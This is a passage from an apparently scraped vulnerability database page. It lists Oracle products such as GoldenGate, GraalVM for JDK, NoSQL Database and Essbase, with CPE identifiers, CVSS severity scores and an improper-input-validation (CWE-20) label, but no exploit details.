sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
41 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
oracle_goldengate
oracle
|
cpe:2.3:a:oracle:oracle_goldengate:*:*:*:*:*:*:*:*
|
— | |
|
oracle_goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:oracle_goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
oracle_goldengate_studio
oracle
|
cpe:2.3:a:oracle:oracle_goldengate_studio:*:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
0.0 (None)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
5.6 (Medium)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
5.6 (Medium)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
5.6 (Medium)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
6.4 (Medium)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
CWE-20
- Improper Input Validation
Affected products
Known affected
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
application_express_administration
oracle
|
cpe:2.3:a:oracle:application_express_administration:*:*:*:*:*:*:*:*
|
— | |
|
application_express_customers_plugin
oracle
|
cpe:2.3:a:oracle:application_express_customers_plugin:*:*:*:*:*:*:*:*
|
— | |
|
application_express_team_calendar_plugin
oracle
|
cpe:2.3:a:oracle:application_express_team_calendar_plugin:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4.3.0.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:19.5.33:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:20.3.28:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:21.2.55:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:22.3.26:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.0.0.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data
oracle
|
cpe:2.3:a:oracle:goldengate_big_data:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— |
CWE-20
- Improper Input Validation
Affected products
Known affected
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
application_express_administration
oracle
|
cpe:2.3:a:oracle:application_express_administration:*:*:*:*:*:*:*:*
|
— | |
|
application_express_customers_plugin
oracle
|
cpe:2.3:a:oracle:application_express_customers_plugin:*:*:*:*:*:*:*:*
|
— | |
|
application_express_team_calendar_plugin
oracle
|
cpe:2.3:a:oracle:application_express_team_calendar_plugin:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4.3.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.0.0.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:19.5.33:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:20.3.28:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:21.2.55:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:22.3.26:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data
oracle
|
cpe:2.3:a:oracle:goldengate_big_data:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— |
5.3 (Medium)
Affected products
Known affected
44 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.0.0.0:*:*:*:*:*:*:*
|
— | |
|
oracle_nosql_database
oracle
|
cpe:2.3:a:oracle:oracle_nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:24.3.0:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data
oracle
|
cpe:2.3:a:oracle:goldengate_big_data:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
43 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:prior_to_19.5.42:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:prior_to_20.3.40:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:prior_to_23.3.32:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:prior_to_22.3.46:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:prior_to_21.2.27:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
